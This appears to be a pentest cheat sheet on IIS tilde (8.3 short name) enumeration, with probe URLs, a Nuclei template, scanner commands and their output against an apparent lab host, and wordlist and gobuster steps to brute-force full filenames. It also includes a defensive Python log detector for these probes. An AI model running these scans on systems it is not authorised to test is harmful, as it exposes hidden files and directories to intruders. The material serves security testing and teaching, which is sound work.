IIS

Tilde Enumeration

http://example.com/~a
http://example.com/~b
http://example.com/~c
...

Assume the server contains a hidden directory named SecretDocuments. When a request is sent to http://example.com/~s, the server replies with a 200 OK status code, revealing a directory whose short name begins with "s". The next character is then probed in the same way:

http://example.com/~se
http://example.com/~sf
http://example.com/~sg
...

Once the short name secret~1 is identified, specific file names within that path can be enumerated, potentially exposing sensitive documents.

http://example.com/secret~1/somefile.txt
http://example.com/secret~1/anotherfile.docx

The same IIS tilde directory enumeration technique can also detect 8.3 short file names for files within the directory.

http://example.com/secret~1/somefi~1.txt

If two files named somefile.txt and somefile1.txt exist in the same directory, their 8.3 short file names would be:

  • somefi~1.txt for somefile.txt

  • somefi~2.txt for somefile1.txt

IIS Tilde Enumeration Scanner - Burp Extension

Nuclei Template

https://github.com/coffinxp/priv8-Nuclei/blob/main/iis.yaml

id: iis-shortname

info:
  name: iis-shortname
  author: coffin
  severity: low
  description: When IIS uses an old .Net Framework it's possible to enumeration folder with the symbol ~.
  reference:
    - https://github.com/irsdl/IIS-ShortName-Scanner
    - https://github.com/lijiejie/IIS_shortname_Scanner
    - https://www.exploit-db.com/exploits/19525
  tags: iis

variables:
  randstring: "{{to_lower(rand_base(8))}}"

requests:
  - raw:
    - |
        GET /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    - |
        GET /*~1*/a.aspx' HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    - |
        OPTIONS /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    - |
        OPTIONS /*~1*/a.aspx' HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    - |
        DEBUG /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    - |
        DEBUG /*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 != 404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404 || status_code_5 != 404 && status_code_6 == 404"
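The probes in the template above leave a recognisable trace on the server side. As an added example (not part of this page or of any of the tools it lists), the following Python parses a constructed IIS W3C extended log and counts, per client address, the wildcard tilde probes separately from the follow-up requests for a confirmed short name such as secret~1/. The sample log lines, the field list and the alert threshold are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, Iterator, List

# Constructed IIS W3C extended log sample (not real traffic). The probe shapes
# mirror the template requests above: a "*" wildcard next to "~<digit>" plus a
# bogus trailing file, sent with GET, OPTIONS and DEBUG.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2024-01-10 10:00:01 10.0.0.5 GET /index.aspx - 80 198.51.100.7 Mozilla/5.0+(Windows) 200
2024-01-10 10:00:02 10.0.0.5 GET /xqzrtkpw*~1*/a.aspx - 80 203.0.113.9 Mozilla/5.0+(Windows) 404
2024-01-10 10:00:02 10.0.0.5 GET /*~1*/a.aspx - 80 203.0.113.9 Mozilla/5.0+(Windows) 404
2024-01-10 10:00:03 10.0.0.5 OPTIONS /s*~1*/a.aspx - 80 203.0.113.9 Mozilla/5.0+(Windows) 200
2024-01-10 10:00:03 10.0.0.5 OPTIONS /se*~1*/a.aspx - 80 203.0.113.9 Mozilla/5.0+(Windows) 404
2024-01-10 10:00:04 10.0.0.5 DEBUG /t*~1*/a.aspx - 80 203.0.113.9 Mozilla/5.0+(Windows) 500
2024-01-10 10:00:05 10.0.0.5 GET /secret~1/somefile.txt - 80 203.0.113.9 Mozilla/5.0+(Windows) 404
2024-01-10 10:00:06 10.0.0.5 GET /~user/page.html - 80 198.51.100.7 Mozilla/5.0+(Windows) 200
"""

# A path segment that combines a "*" wildcard with "~<digit>": no real long
# file name needs that, so it is the signature of the enumeration itself.
WILDCARD_PROBE = re.compile(r"/[^/]*\*[^/]*~\d[^/]*|/[^/]*~\d[^/]*\*[^/]*")
# A bare 8.3 alias (up to 6 chars, ~N, optional 3-char extension) used as a
# path segment: the follow-up once a short name has been confirmed.
SHORT_NAME_PATH = re.compile(r"/[A-Za-z0-9_\-]{1,6}~\d{1,4}(\.[A-Za-z0-9]{1,3})?(/|$)")

def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per log entry, naming columns from the #Fields header."""
    fields: List[str] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def tilde_probes(text: str) -> Dict[str, Dict[str, int]]:
    """Count wildcard probes and short-name follow-ups per client address."""
    counts: Dict[str, Dict[str, int]] = defaultdict(lambda: {"wildcard": 0, "shortname": 0})
    for entry in parse_w3c(text):
        stem = entry["cs-uri-stem"]
        if WILDCARD_PROBE.search(stem):
            counts[entry["c-ip"]]["wildcard"] += 1
        elif SHORT_NAME_PATH.search(stem):
            counts[entry["c-ip"]]["shortname"] += 1
    return dict(counts)

def suspicious_clients(text: str, threshold: int = 3) -> List[str]:
    """Clients whose wildcard probe count reaches the (assumed) threshold."""
    return sorted(ip for ip, c in tilde_probes(text).items() if c["wildcard"] >= threshold)
```

Ordinary tilde URLs such as /~user/ carry no wildcard and no digit after the tilde, so they are deliberately left unmatched.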

ShortScan

shortscan http://yourtarget.com -F

IIS ShortName Scanner

java -jar iis_shortname_scanner.jar 0 5 http://10.129.204.231/

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Do you want to use proxy [Y=Yes, Anything Else=No]? 
# IIS Short Name (8.3) Scanner version 2023.0 - scan initiated 2023/03/23 15:06:57
Target: http://10.129.204.231/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/
|_ Extra information:
  |_ Number of sent requests: 553
  |_ Identified directories: 2
    |_ ASPNET~1
    |_ UPLOAD~1
  |_ Identified files: 3
    |_ CSASPX~1.CS
      |_ Actual extension = .CS
    |_ CSASPX~1.CS??
    |_ TRANSF~1.ASP

Running the tool discovers 2 directories and 3 files. However, the target does not permit GET access to http://10.129.204.231/TRANSF~1.ASP, so the rest of the filename has to be brute-forced.

Or:

# python iis_shortname_scan.py http://target

Generate Wordlist

egrep -r ^transf /usr/share/wordlists/ | sed 's/^[^:]*://' > /tmp/list.txt

Fuzzing

gobuster dir -u http://10.129.204.231/ -w /tmp/list.txt -x .aspx,.asp

Resources

Script to configure IIS
